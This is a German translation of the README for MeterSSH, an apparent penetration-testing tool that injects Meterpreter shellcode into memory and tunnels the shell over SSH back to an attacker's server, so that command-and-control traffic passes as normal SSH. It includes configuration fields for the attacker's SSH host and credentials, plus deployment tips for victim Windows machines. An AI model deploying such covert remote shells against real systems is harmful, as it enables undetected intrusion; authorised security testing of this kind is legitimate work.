
MeterSSH ist eine Methode, um Shellcode zu nehmen, in den Speicher zu injizieren und dann einen beliebigen Port über SSH zu tunneln, um jegliche Art von Kommunikation als normale SSH-Verbindung zu tarnen. Die Funktionsweise besteht darin, Shellcode in den Speicher zu injizieren und dann einen vom Shellcode erzeugten Port (in diesem Fall Meterpreter) über SSH zurück zum Rechner des Angreifers zu tunneln. Durch die Verbindung mit dem Listener von Meterpreter auf localhost wird über den SSH-Proxy mit dem Opfer durch den SSH-Tunnel kommuniziert. Die gesamte Kommunikation wird über den SSH-Tunnel und nicht über das Netzwerk weitergeleitet.
Werkzeugname: MeterSSH Geschrieben von: David Kennedy Firma: TrustedSec Webseite: https://www.trustedsec.com Twitter: @TrustedSec, @HackingDave
MeterSSH ist eine Möglichkeit, Shellcode zu nehmen, in den Speicher zu injizieren und dann einen beliebigen Port über SSH zu tunneln, um jegliche Art von Kommunikation als normale SSH-Verbindung zu tarnen. Die Funktionsweise besteht darin, Shellcode in den Speicher zu injizieren, dann einen vom Shellcode erzeugten Port (in diesem Fall Meterpreter) über SSH zurück zum Angreifer-Rechner zu tunneln. Die Verbindung mit dem Meterpreter-Listener auf localhost kommuniziert dann über den SSH-Proxy zum Opfer durch den SSH-Tunnel. Die gesamte Kommunikation wird über den SSH-Tunnel und nicht über das Netzwerk geleitet.
Für Fehlerberichte oder Verbesserungen melden Sie bitte ein Issue hier: https://github.com/trustedsec/artillery/issues
Es gibt zwei Dateien: monitor.py und meterssh.py.
monitor.py – führen Sie dies aus, um auf eine SSH-Verbindung zu lauschen; es fragt localhost auf Port 8021 nach einem SSH-Tunnel ab und startet dann automatisch Metasploit, um die Shell zu übernehmen. meterssh.py – dies wird auf dem Opferrechner bereitgestellt; beachten Sie, dass die meisten Windows-Rechner kein Python installiert haben. Es wird empfohlen, Python mit py2exe oder pyinstaller zu kompilieren.
Felder, die Sie in meterssh.py bearbeiten müssen:
user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"
user – dies ist das Benutzerkonto für den SSH-Server des Angreifers (root nicht verwenden, root ist nicht erforderlich) password – dies ist das Passwort für den SSH-Server des Angreifers rhost – dies ist die IP-Adresse des SSH-Servers des Angreifers port – dies ist der Port des SSH-Servers des Angreifers
Beachten Sie, dass Sie den Metasploit-Shellcode NICHT ändern müssen; der Metasploit-Shellcode ist einfach ein unveränderter windows/meterpreter/bind_tcp, der an Port 8021 bindet. Wenn Sie dies ändern möchten, tauschen Sie einfach den Shellcode aus und ändern Sie Port 8021 im Skript, um an einen beliebigen Port zu binden. Sie müssen dies jedoch nicht tun, es sei denn, Sie möchten anpassen/ändern.
Copyright 2016, MeterSSH von TrustedSec, LLC Alle Rechte vorbehalten.
Die Weiterverbreitung und Nutzung in Quell- und Binärform, mit oder ohne Änderungen, ist unter folgenden Bedingungen gestattet:
* Weiterverbreitungen des Quellcodes müssen den obigen Urheberrechtshinweis, diese Liste von Bedingungen und den folgenden Haftungsausschluss enthalten.
* Weiterverbreitungen in Binärform müssen den obigen Urheberrechtshinweis, diese Liste von Bedingungen und den folgenden Haftungsausschluss in der Dokumentation und/oder anderen mitgelieferten Materialien wiedergeben.
* Weder der Name von MeterSSH noch die Namen seiner Mitwirkenden dürfen ohne vorherige schriftliche Genehmigung zur Werbung oder Förderung von Produkten verwendet werden, die von dieser Software abgeleitet wurden.
DIESE SOFTWARE WIRD VON DEN URHEBERRECHTSINHABERN UND MITWIRKENDEN „WIE BESEHEN“ BEREITGESTELLT, UND JEGLICHE AUSDRÜCKLICHEN ODER KONKLUDENTEN GEWÄHRLEISTUNGEN, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF, DIE KONKLUDENTEN GEWÄHRLEISTUNGEN DER MARKTGÄNGIGKEIT UND DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK, WERDEN AUSGESCHLOSSEN. IN KEINEM FALL HAFTEN DIE URHEBERRECHTSINHABER ODER MITWIRKENDEN FÜR DIREKTE, INDIREKTE, ZUFÄLLIGE, BESONDERE, BEISPIELHAFTE ODER FOLGESCHÄDEN (EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF, DIE BESCHAFFUNG VON ERSATZGÜTERN ODER -DIENSTLEISTUNGEN; NUTZUNGSAUSFALL, DATENVERLUST ODER GEWINNVERLUST; ODER GESCHÄFTSUNTERBRECHUNG), WIE AUCH IMMER VERURSACHT UND AUF JEDER HAFTUNGSTHEORIE, OB AUS VERTRAG, STRIKTER HAFTUNG ODER UNERLAUBTER HANDLUNG (EINSCHLIESSLICH FAHRLÄSSIGKEIT ODER ANDERWEITIG), DIE AUS DER NUTZUNG DIESER SOFTWARE ENTSTEHEN, SELBST WENN AUF DIE MÖGLICHKEIT SOLCHER SCHÄDEN HINGEWIESEN WURDE.
Die obige Lizenzierung stammt aus der BSD-Lizenz und gilt auch für MeterSSH.
Beachten Sie, dass MeterSSH wie besehen bereitgestellt wird und eine lizenzgebührenfreie Open-Source-Anwendung ist.
Sie können die Software nach Belieben modifizieren, nutzen, ändern, vermarkten oder damit tun, was Sie möchten, solange Sie die entsprechende Anerkennung geben, wo Anerkennung gebührt (was bedeutet, den Autoren die Anerkennung zu geben, die sie für das Schreiben verdienen). Beachten Sie auch, dass Sie dem Erschaffer von SET, falls Sie ihm jemals in einer Bar begegnen, eine Umarmung geben und ihm ein Bier kaufen sollten. Die Umarmung muss mindestens 5 Sekunden dauern. Der Autor behält sich das Recht vor, die Umarmung (was höchstwahrscheinlich nie passieren wird) oder das Bier (auch höchstwahrscheinlich nie) abzulehnen.